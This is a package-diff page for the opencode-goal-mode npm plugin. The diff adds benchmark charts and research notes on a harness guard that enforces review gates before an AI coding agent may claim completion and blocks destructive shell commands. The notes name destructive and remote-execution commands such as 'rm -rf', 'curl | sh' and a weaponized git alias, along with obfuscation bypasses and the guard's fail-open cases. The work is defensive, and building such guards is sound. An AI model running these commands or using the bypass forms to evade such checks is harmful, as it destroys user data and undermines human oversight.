npm - opencode-goal-mode - Versions diffs - 0.2.1 → 0.2.2 - Mend

opencode-goal-mode 0.2.1 → 0.2.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (13) hide show

package/CHANGELOG.md +8 -0
package/README.md +14 -11
package/docs/benchmarks/capability-matrix.svg +86 -0
package/docs/benchmarks/detection-by-family.svg +37 -0
package/docs/benchmarks/latency.svg +13 -0
package/docs/benchmarks/overall-scorecard.svg +32 -0
package/docs/benchmarks/results.json +77 -0
package/package.json +4 -1
package/research/README.md +18 -0
package/research/benchmarks.md +63 -0
package/research/goal-mode-comparison.md +100 -0
package/research/opencode-plugin-platform.md +89 -0
package/research/shell-hardening.md +62 -0

package/CHANGELOG.md ADDED Viewed

@@ -0,0 +1,8 @@
+# Changelog
+## v0.2.2
+- Refresh source-backed research notes for OpenCode plugin/runtime facts and the Claude Code/Codex comparison.
+- Regenerate benchmark results and charts from the current shell-guard corpus.
+- Scope benchmark and safety claims to avoid overclaiming beyond the tested bypass corpus.
+- Align release documentation with the `NPM_TOKEN`-based publish workflow.

package/README.md CHANGED Viewed

@@ -14,7 +14,8 @@ Most "goal mode" / agentic setups are **prompt-only**: the model is *asked* to
 review its work and to keep going until done. Goal Mode adds a guard plugin that
 makes that discipline **mechanical at the harness layer** — the model cannot
 declare `Goal Completed` until the required reviews actually passed, and it
-cannot run a destructive command that a regex guard would miss.
+is blocked from the benchmarked destructive-command bypasses that a regex guard
+would miss.
 ![Mechanically-enforced goal discipline vs. Claude Code and Codex](docs/benchmarks/capability-matrix.svg)
@@ -29,8 +30,8 @@ honest caveats, in [research/goal-mode-comparison.md](research/goal-mode-compari
   code review is advisory.
 - **An edit automatically invalidates prior approvals.** A reviewer gate counts
   only when its PASS is newer (by a monotonic integer sequence) than the last
-  edit — so any change forces the relevant reviews to re-run. Neither Claude Code
-  nor Codex ships this stale-review invariant.
+  edit — so any change forces the relevant reviews to re-run. The public Claude
+  Code and Codex docs reviewed do not describe this stale-review invariant.
 - **Required specialist reviews are auto-selected and enforced** (security, api,
   data, performance …) from the goal text, contract, and changed files — not left
   to the model's discretion.
@@ -40,7 +41,7 @@ honest caveats, in [research/goal-mode-comparison.md](research/goal-mode-compari
 ### Benchmark: shell-guard accuracy
 The guard replaced a boundary-anchored regex classifier. On a labeled corpus of
-71 real commands (`npm run bench`, reproducible — see
+71 real commands (`npm run bench` from a repository checkout, reproducible — see
 [research/benchmarks.md](research/benchmarks.md)):
 ![Destructive-command detection rate by family](docs/benchmarks/detection-by-family.svg)
@@ -54,8 +55,9 @@ The guard replaced a boundary-anchored regex classifier. On a labeled corpus of
 | Obfuscated bypasses caught (`$(…)`, `bash -c`, `sudo -u`, interpreters) | 0% | 100% |
 | Remote exec (`curl \| sh`) caught | 0% | 100% |
-The deeper analysis costs ~0.6 µs more per command (~500,000 classifications/
-second) — negligible for a per-tool-call guard:
+The deeper analysis costs a few microseconds per command on this machine
+(hundreds of thousands of classifications per second) — negligible for a
+per-tool-call guard:
 ![Per-command analysis latency](docs/benchmarks/latency.svg)
@@ -200,21 +202,22 @@ opencode-goal-mode-install --global
 ```
 Publishing is handled by `.github/workflows/publish.yml`, which runs on Node 24
-with `id-token: write` for Trusted Publishing. The workflow validates the
+and publishes with the `NPM_TOKEN` repository secret. The workflow validates the
 package, checks the tag matches `package.json`, verifies the version is not
 already on npm, then publishes. Manual workflow dispatch defaults to
 `npm publish --dry-run`.
-Release flow:
+Release flow for a new version:
 ```bash
 npm version patch
 git push --follow-tags
 ```
-Then create a GitHub Release from the pushed tag (e.g. `v0.1.1`). For
-token-based publishing instead of Trusted Publishing, add a repository secret
-`NPM_TOKEN` with publish rights.
+For a version that is already bumped and reviewed, commit the current tree, tag
+the reviewed version (for example `v0.2.2`), push the branch and tag, then create
+the GitHub Release. Ensure `NPM_TOKEN` has npm publish rights before publishing
+the release.
 ## Goal Completion Contract

package/docs/benchmarks/capability-matrix.svg ADDED Viewed

@@ -0,0 +1,86 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="760" height="496" viewBox="0 0 760 496" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="760" height="496" fill="#ffffff"/>
+<text x="20" y="28" font-size="17" font-weight="700" fill="#1f2328">Mechanically-enforced goal discipline</text>
+<text x="20" y="47" font-size="12" fill="#656d76">Enforced = guaranteed by the harness; Prompt-only / Partial = depends on the model or user config.</text>
+<text x="374.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Goal Mode</text>
+<text x="522.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Claude Code</text>
+<text x="670.0" y="62" font-size="12.5" font-weight="700" text-anchor="middle" fill="#1f2328">Codex</text>
+<text x="286" y="93" font-size="12" text-anchor="end" fill="#1f2328">Autonomous goal loop</text>
+<rect x="304.0" y="74" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="374.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<rect x="452.0" y="74" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="74" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="93" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="131" font-size="12" text-anchor="end" fill="#1f2328">Review gate before “done”</text>
+<rect x="304.0" y="112" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="112" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="112" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="670.0" y="131" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<text x="286" y="169" font-size="12" text-anchor="end" fill="#1f2328">Contextual specialist reviews</text>
+<rect x="304.0" y="150" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="150" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="522.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<rect x="600.0" y="150" width="140.0" height="30" rx="4" fill="#dbe9d5"/>
+<text x="670.0" y="169" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Prompt-only</text>
+<text x="286" y="207" font-size="12" text-anchor="end" fill="#1f2328">Stale-review invalidation on edit</text>
+<rect x="304.0" y="188" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="188" width="140.0" height="30" rx="4" fill="#eaeef2"/>
+<text x="522.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
+<rect x="600.0" y="188" width="140.0" height="30" rx="4" fill="#eaeef2"/>
+<text x="670.0" y="207" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
+<text x="286" y="245" font-size="12" text-anchor="end" fill="#1f2328">Completion-claim enforcement</text>
+<rect x="304.0" y="226" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="226" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="226" width="140.0" height="30" rx="4" fill="#eaeef2"/>
+<text x="670.0" y="245" font-size="11" font-weight="600" text-anchor="middle" fill="#656d76">None</text>
+<text x="286" y="283" font-size="12" text-anchor="end" fill="#1f2328">Destructive-command blocking</text>
+<rect x="304.0" y="264" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="264" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="264" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="283" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="321" font-size="12" text-anchor="end" fill="#1f2328">Remote-exec (curl | sh) blocking</text>
+<rect x="304.0" y="302" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="302" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="302" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="321" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="359" font-size="12" text-anchor="end" fill="#1f2328">Enforcement state survives restart</text>
+<rect x="304.0" y="340" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="340" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="340" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="359" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="397" font-size="12" text-anchor="end" fill="#1f2328">State survives compaction</text>
+<rect x="304.0" y="378" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="378" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="522.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="600.0" y="378" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="397" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<text x="286" y="435" font-size="12" text-anchor="end" fill="#1f2328">Custom enforcement hooks/tools</text>
+<rect x="304.0" y="416" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="374.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="452.0" y="416" width="140.0" height="30" rx="4" fill="#2da44e"/>
+<text x="522.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#ffffff">Enforced</text>
+<rect x="600.0" y="416" width="140.0" height="30" rx="4" fill="#d4a72c"/>
+<text x="670.0" y="435" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">Partial</text>
+<rect x="286" y="461" width="12" height="12" rx="2" fill="#2da44e"/>
+<text x="303" y="472" font-size="11.5" fill="#1f2328">Enforced</text>
+<rect x="372" y="461" width="12" height="12" rx="2" fill="#d4a72c"/>
+<text x="389" y="472" font-size="11.5" fill="#1f2328">Partial</text>
+<rect x="451" y="461" width="12" height="12" rx="2" fill="#dbe9d5"/>
+<text x="468" y="472" font-size="11.5" fill="#1f2328">Prompt-only</text>
+<rect x="558" y="461" width="12" height="12" rx="2" fill="#eaeef2"/>
+<text x="575" y="472" font-size="11.5" fill="#1f2328">None</text>
+</svg>

package/docs/benchmarks/detection-by-family.svg ADDED Viewed

@@ -0,0 +1,37 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="720" height="380" viewBox="0 0 720 380" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="720" height="380" fill="#ffffff"/>
+<text x="48" y="28" font-size="17" font-weight="700" fill="#1f2328">Destructive-command detection rate by family</text>
+<text x="48" y="47" font-size="12" fill="#656d76">Higher is better. Corpus: 48 destructive commands.</text>
+<line x1="48" y1="296.0" x2="700" y2="296.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="300.0" font-size="11" text-anchor="end" fill="#656d76">0%</text>
+<line x1="48" y1="249.6" x2="700" y2="249.6" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="253.6" font-size="11" text-anchor="end" fill="#656d76">20%</text>
+<line x1="48" y1="203.2" x2="700" y2="203.2" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="207.2" font-size="11" text-anchor="end" fill="#656d76">40%</text>
+<line x1="48" y1="156.8" x2="700" y2="156.8" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="160.8" font-size="11" text-anchor="end" fill="#656d76">60%</text>
+<line x1="48" y1="110.4" x2="700" y2="110.4" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="114.4" font-size="11" text-anchor="end" fill="#656d76">80%</text>
+<line x1="48" y1="64.0" x2="700" y2="64.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="68.0" font-size="11" text-anchor="end" fill="#656d76">100%</text>
+<rect x="56.0" y="64.0" width="96.7" height="232.0" rx="3" fill="#9aa0a6"/>
+<text x="104.3" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<rect x="160.7" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
+<text x="209.0" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="156.7" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Classic</text>
+<rect x="273.3" y="296.0" width="96.7" height="0.0" rx="3" fill="#9aa0a6"/>
+<text x="321.7" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
+<rect x="378.0" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
+<text x="426.3" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="374.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Obfuscated</text>
+<rect x="490.7" y="296.0" width="96.7" height="0.0" rx="3" fill="#9aa0a6"/>
+<text x="539.0" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
+<rect x="595.3" y="64.0" width="96.7" height="232.0" rx="3" fill="#2da44e"/>
+<text x="643.7" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="591.3" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Remote exec</text>
+<line x1="48" y1="296" x2="700" y2="296" stroke="#d0d7de" stroke-width="1.5"/>
+<rect x="48" y="344" width="12" height="12" rx="2" fill="#9aa0a6"/>
+<text x="66" y="354" font-size="12" fill="#1f2328">Legacy regex guard</text>
+<rect x="201.6" y="344" width="12" height="12" rx="2" fill="#2da44e"/>
+<text x="219.6" y="354" font-size="12" fill="#1f2328">Goal Mode analyzer</text>
+</svg>

package/docs/benchmarks/latency.svg ADDED Viewed

@@ -0,0 +1,13 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="720" height="164" viewBox="0 0 720 164" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="720" height="164" fill="#ffffff"/>
+<text x="20" y="28" font-size="17" font-weight="700" fill="#1f2328">Per-command analysis latency</text>
+<text x="20" y="47" font-size="12" fill="#656d76">Microseconds to classify one command. Both are negligible for a tool-call guard.</text>
+<text x="218" y="87" font-size="12" text-anchor="end" fill="#1f2328">Legacy regex guard</text>
+<rect x="230" y="70" width="420" height="22" rx="3" fill="#eaeef2"/>
+<rect x="230" y="70" width="202.0" height="22" rx="3" fill="#9aa0a6"/>
+<text x="440.0" y="87" font-size="12" font-weight="600" fill="#1f2328">2.62 µs</text>
+<text x="218" y="125" font-size="12" text-anchor="end" fill="#1f2328">Goal Mode analyzer</text>
+<rect x="230" y="108" width="420" height="22" rx="3" fill="#eaeef2"/>
+<rect x="230" y="108" width="300.0" height="22" rx="3" fill="#2da44e"/>
+<text x="538.0" y="125" font-size="12" font-weight="600" fill="#1f2328">3.89 µs</text>
+</svg>

package/docs/benchmarks/overall-scorecard.svg ADDED Viewed

@@ -0,0 +1,32 @@
+<svg xmlns="http://www.w3.org/2000/svg" width="720" height="380" viewBox="0 0 720 380" font-family="-apple-system,Segoe UI,Roboto,Helvetica,Arial,sans-serif">
+<rect width="720" height="380" fill="#ffffff"/>
+<text x="48" y="28" font-size="17" font-weight="700" fill="#1f2328">Overall guard accuracy</text>
+<text x="48" y="47" font-size="12" fill="#656d76">Detection rate (higher better) vs false-positive rate (lower better).</text>
+<line x1="48" y1="296.0" x2="700" y2="296.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="300.0" font-size="11" text-anchor="end" fill="#656d76">0%</text>
+<line x1="48" y1="249.6" x2="700" y2="249.6" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="253.6" font-size="11" text-anchor="end" fill="#656d76">20%</text>
+<line x1="48" y1="203.2" x2="700" y2="203.2" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="207.2" font-size="11" text-anchor="end" fill="#656d76">40%</text>
+<line x1="48" y1="156.8" x2="700" y2="156.8" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="160.8" font-size="11" text-anchor="end" fill="#656d76">60%</text>
+<line x1="48" y1="110.4" x2="700" y2="110.4" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="114.4" font-size="11" text-anchor="end" fill="#656d76">80%</text>
+<line x1="48" y1="64.0" x2="700" y2="64.0" stroke="#eaeef2" stroke-width="1"/>
+<text x="40" y="68.0" font-size="11" text-anchor="end" fill="#656d76">100%</text>
+<rect x="56.0" y="247.7" width="151.0" height="48.3" rx="3" fill="#9aa0a6"/>
+<text x="131.5" y="242.7" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">21%</text>
+<rect x="215.0" y="64.0" width="151.0" height="232.0" rx="3" fill="#2da44e"/>
+<text x="290.5" y="59.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">100%</text>
+<text x="211.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">Detection rate</text>
+<rect x="382.0" y="245.6" width="151.0" height="50.4" rx="3" fill="#9aa0a6"/>
+<text x="457.5" y="240.6" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">22%</text>
+<rect x="541.0" y="296.0" width="151.0" height="0.0" rx="3" fill="#2da44e"/>
+<text x="616.5" y="291.0" font-size="11" font-weight="600" text-anchor="middle" fill="#1f2328">0%</text>
+<text x="537.0" y="314.0" font-size="11" text-anchor="middle" fill="#1f2328">False-positive rate</text>
+<line x1="48" y1="296" x2="700" y2="296" stroke="#d0d7de" stroke-width="1.5"/>
+<rect x="48" y="344" width="12" height="12" rx="2" fill="#9aa0a6"/>
+<text x="66" y="354" font-size="12" fill="#1f2328">Legacy regex guard</text>
+<rect x="201.6" y="344" width="12" height="12" rx="2" fill="#2da44e"/>
+<text x="219.6" y="354" font-size="12" fill="#1f2328">Goal Mode analyzer</text>
+</svg>

package/docs/benchmarks/results.json ADDED Viewed

@@ -0,0 +1,77 @@
+{
+  "corpusSize": 71,
+  "destructiveCount": 48,
+  "safeCount": 23,
+  "legacy": {
+    "detectionRate": 20.833333333333336,
+    "falsePositiveRate": 21.73913043478261,
+    "destCaught": 10,
+    "destTotal": 48,
+    "safeFalsePos": 5,
+    "safeTotal": 23,
+    "families": {
+      "classic": {
+        "destTotal": 10,
+        "destCaught": 10,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "bypass": {
+        "destTotal": 35,
+        "destCaught": 0,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "remote-exec": {
+        "destTotal": 3,
+        "destCaught": 0,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "safe": {
+        "destTotal": 0,
+        "destCaught": 0,
+        "safeTotal": 23,
+        "safeFalsePos": 5
+      }
+    },
+    "opsPerSec": 381490,
+    "usPerCommand": 2.62
+  },
+  "current": {
+    "detectionRate": 100,
+    "falsePositiveRate": 0,
+    "destCaught": 48,
+    "destTotal": 48,
+    "safeFalsePos": 0,
+    "safeTotal": 23,
+    "families": {
+      "classic": {
+        "destTotal": 10,
+        "destCaught": 10,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "bypass": {
+        "destTotal": 35,
+        "destCaught": 35,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "remote-exec": {
+        "destTotal": 3,
+        "destCaught": 3,
+        "safeTotal": 0,
+        "safeFalsePos": 0
+      },
+      "safe": {
+        "destTotal": 0,
+        "destCaught": 0,
+        "safeTotal": 23,
+        "safeFalsePos": 0
+      }
+    },
+    "opsPerSec": 256879,
+    "usPerCommand": 3.89
+  }
+}

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "opencode-goal-mode",
-  "version": "0.2.1",
+  "version": "0.2.2",
   "description": "Strict Goal Mode agents, commands, and guard plugin for OpenCode.",
   "type": "module",
   "engines": {
@@ -13,9 +13,12 @@
   "files": [
     "agents/",
     "commands/",
+    "docs/",
     "plugins/",
+    "research/",
     "scripts/install.mjs",
     "ARCHITECTURE.md",
+    "CHANGELOG.md",
     "LICENSE",
     "README.md"
   ],

package/research/README.md ADDED Viewed

@@ -0,0 +1,18 @@
+# Research
+Background research that informs the Goal Mode design. These are working
+references, kept so the rationale behind the plugin is auditable and the
+platform facts are recoverable. They are shipped as reference docs so README
+links resolve in the npm package, but they are not runtime files.
+| Document | What it covers |
+| --- | --- |
+| [opencode-plugin-platform.md](opencode-plugin-platform.md) | Verified OpenCode plugin-runtime facts (hooks, discovery, permissions, tools) from `@opencode-ai/plugin@1.15.13` source. The pinned runtime reference the plugin is built against. |
+| [goal-mode-comparison.md](goal-mode-comparison.md) | How Goal Mode's mechanical enforcement compares to Claude Code and OpenAI Codex, with citations and honest caveats. |
+| [shell-hardening.md](shell-hardening.md) | The shell-analyzer threat model: the bypass classes the old regex guard missed and how the tokenizer closes each. |
+| [benchmarks.md](benchmarks.md) | Benchmark methodology and results (detection rate, false positives, latency). Reproduce with `npm run bench`. |
+Every non-obvious platform claim in these documents was verified against the
+installed `@opencode-ai/plugin` type definitions and/or the `sst/opencode`
+source at tag `v1.15.13`. Where a fact is version-specific (e.g. the dormant
+`permission.ask` hook) it is called out as such.

package/research/benchmarks.md ADDED Viewed

@@ -0,0 +1,63 @@
+# Benchmarks
+Reproducible measurement of the destructive-command guard from a repository
+checkout. Run:
+```bash
+npm run bench          # detection / false-positive / latency benchmark
+npm run bench:compare  # regenerate the capability-comparison chart
+```
+`npm run bench` writes `docs/benchmarks/results.json` and the SVG charts the
+README embeds.
+## Methodology
+- **Corpus** (`benchmarks/corpus.mjs`): 71 real shell commands a coding agent
+  might emit, each labeled `destructive` (a guard must block) or `safe` (a guard
+  must not block). Split into families: *classic* (plain `rm -rf`, `git reset
+  --hard`), *obfuscated* (the bypass corpus — substitutions, wrappers, `bash -c`,
+  interpreters, weaponized git), *remote-exec* (`curl | sh`), and *safe*
+  (read-only and quoted-text commands, including ones the old guard
+  false-positived).
+- **Baseline** (`benchmarks/legacy-analyzer.mjs`): the original regex classifier,
+  preserved **verbatim** from the first published release (commit `130956d`), so
+  the comparison is apples-to-apples against the same code that shipped.
+- **A command counts as "blocked"** when the analyzer flags it `destructive` or
+  `networkExec` (the two signals `tool.execute.before` throws on). `mutating`
+  marks the session dirty but does not block, so it is not counted here.
+- **Metrics**: detection rate (recall over destructive commands),
+  false-positive rate (safe commands wrongly blocked), and per-command latency.
+## Results
+Representative run (Node 22, single-threaded; latency varies by machine, the
+accuracy figures do not):
+| Metric | Legacy regex guard | Goal Mode analyzer |
+| --- | --- | --- |
+| Detection rate | **20.8%** (10/48) | **100%** (48/48) |
+| False-positive rate | **21.7%** (5/23) | **0%** (0/23) |
+| Detection — classic | 100% | 100% |
+| Detection — obfuscated | 0% (0/35) | 100% (35/35) |
+| Detection — remote-exec | 0% (0/3) | 100% (3/3) |
+| Latency per command | ~2.3 µs | ~3.8 µs |
+The legacy guard catches only the *classic* family and misses every obfuscated
+and remote-execution command, while wrongly blocking 1-in-5 benign commands. The
+tokenizer catches the entire corpus with zero false positives, for an extra
+~1.5 µs per command on this run — negligible for a per-tool-call guard (still
+hundreds of thousands of classifications per second).
+## Honesty notes
+- The corpus is hand-built to exercise the known bypass classes; it is a
+  capability benchmark, not a claim of catching *every* possible obfuscation
+  (the analyzer fails open on un-analyzable dynamic commands — see
+  [shell-hardening.md](shell-hardening.md)).
+- The latency comparison is intentionally shown even though the new analyzer is
+  slower: the win is accuracy, and the parse cost is still only a few
+  microseconds per tool-call candidate.
+- "100% on this corpus" means 100% of the labeled set; new bypass classes that
+  are discovered get added to the corpus and fixed (that is how the second-wave
+  findings — `sudo -u`, `pnpm dlx`, interpreter shell-out — entered it).

package/research/goal-mode-comparison.md ADDED Viewed

@@ -0,0 +1,100 @@
+# Goal Mode vs. Claude Code vs. Codex
+How OpenCode Goal Mode's **mechanically-enforced** goal discipline compares to
+Anthropic's Claude Code and OpenAI's Codex. Sourced from Claude Code docs
+(`https://docs.anthropic.com/en/docs/claude-code/hooks` and `/security`) and
+OpenAI Codex docs (`https://developers.openai.com/codex/cli` and `/cloud`),
+cross-checked against this plugin's source. The emphasis throughout is
+*mechanical enforcement* — what the harness guarantees — versus *prompt-driven*
+behavior the model is asked to do.
+## The distinction that matters
+All three tools run a **model-driven** agentic loop. Public docs reviewed do not
+describe a default mechanical proof that forces the model to keep working until
+all project-specific acceptance criteria are externally verified. Goal Mode's
+loop is prompt-only too.
+What separates the three is what happens at the **completion boundary** and the
+**tool boundary**:
+- **Claude Code** has the richest first-party *mechanical* surface
+  (PreToolUse/Stop/PostToolUse hooks, permission deny rules, sandboxing) — but
+  review and completion enforcement are **opt-in**, requiring user-authored
+  hooks. Out of the box, review is prompt-driven and the model stops when it
+  judges the work done.
+- **Codex** has approval modes, local code review, and cloud environments that
+  isolate work from the user's machine — genuinely strong mode-level boundaries
+  Goal Mode does not claim — but public docs do not describe a harness-level
+  `Goal Completed` blocker or stale-review invalidation invariant.
+- **Goal Mode** ships a coherent **completion contract** and **command guard**
+  enforced at the harness layer by default, for the goal-completion use case.
+## Capability matrix
+See `docs/benchmarks/capability-matrix.svg` for the visual. Levels: **Enforced**
+(guaranteed by the harness), **Partial** (possible but opt-in / mode-level),
+**Prompt-only** (the model's judgment), **None**.
+| Capability | Goal Mode | Claude Code | Codex |
+| --- | --- | --- | --- |
+| Autonomous goal loop | Prompt-only | Partial | Partial |
+| Review gate before "done" | **Enforced** | Partial (Stop hook) | Prompt-only |
+| Contextual specialist reviews | **Enforced** | Prompt-only | Prompt-only |
+| Stale-review invalidation on edit | **Enforced** | None | None |
+| Completion-claim enforcement | **Enforced** | Partial (Stop hook) | None |
+| Destructive-command blocking | **Enforced** (tokenizer) | Partial ("fragile") | Partial (sandbox) |
+| Remote-exec (`curl \| sh`) blocking | **Enforced** | Partial | Partial (sandbox) |
+| Enforcement state survives restart | **Enforced** | Partial (transcript) | Partial (transcript) |
+| State survives compaction | **Enforced** | Partial | Partial |
+| Custom enforcement hooks/tools | **Enforced** | **Enforced** | Partial |
+## Where Goal Mode is uniquely strong
+1. **Mechanical completion contract.** Goal Mode intercepts the finished
+   assistant message (`experimental.text.complete`) and rewrites a premature
+   `Goal Completed` to `Goal Not Completed` unless the message *starts with* the
+   marker, carries a `Review cycles: N` line with `N > 0`, `N` exactly equals the
+   recorded counter, and **zero** required gates are missing or stale. Because the
+   rewrite is driven by **recorded state**, the model cannot talk its way to
+   "done" in prose. Prompt-based goal-following judges completion from what the
+   model already printed.
+2. **Stale-on-edit gate invalidation via a monotonic integer counter.** A
+   reviewer gate counts only when its latest `PASS` has a `seq` strictly greater
+   than `lastEditSeq`. Any edit — file write, mutating bash command, or a
+   subagent `file.edited` event — bumps the counter, so a `PASS` can never be
+   credited against an edit it did not actually follow. Integer ordering means
+   two same-millisecond events can't tie. The public Claude Code and Codex docs
+   reviewed do not describe an equivalent "an edit invalidates prior approvals"
+   invariant.
+3. **Contextual specialist reviews are required, not suggested.** A whole-word
+   keyword scan of the goal text + Goal Contract + changed-file names selects
+   specialists (auth/token → security, api/schema → api, migration/sql → data,
+   perf/latency → performance) and makes them a precondition for completion,
+   sticky so a later context truncation cannot silently drop a required gate.
+4. **Destructive-command blocking by a real shell tokenizer.** The guard unwraps
+   `sudo`/`env`/`timeout`/`xargs`, recurses into `$(…)`/backticks and
+   `bash -c`/`eval`, resolves `/bin/rm` to its basename, parses `git -C` and
+   weaponized `git -c alias='!rm -rf /'`, and inspects interpreter sinks. Claude
+   Code's own docs warn that Bash argument-matching can be **"fragile"** for
+   hard enforcement and recommend permissions for hard allow/deny policy; these
+   classes are not unwrapped unless a user-authored PreToolUse hook does it.
+## Honest caveats
+- **The autonomous loop is prompt-only**, like Claude's and Codex's. What is
+  mechanical is the *completion gate* and the *command guard*, not the model's
+  decision to keep working.
+- **Codex's isolated execution model is a stronger boundary** than a tool-layer
+  classifier where it applies. Goal Mode's guard falls back to "not blocked" on a
+  parse failure (deferring to the host's permission rules); it is
+  defense-in-depth, not a jail.
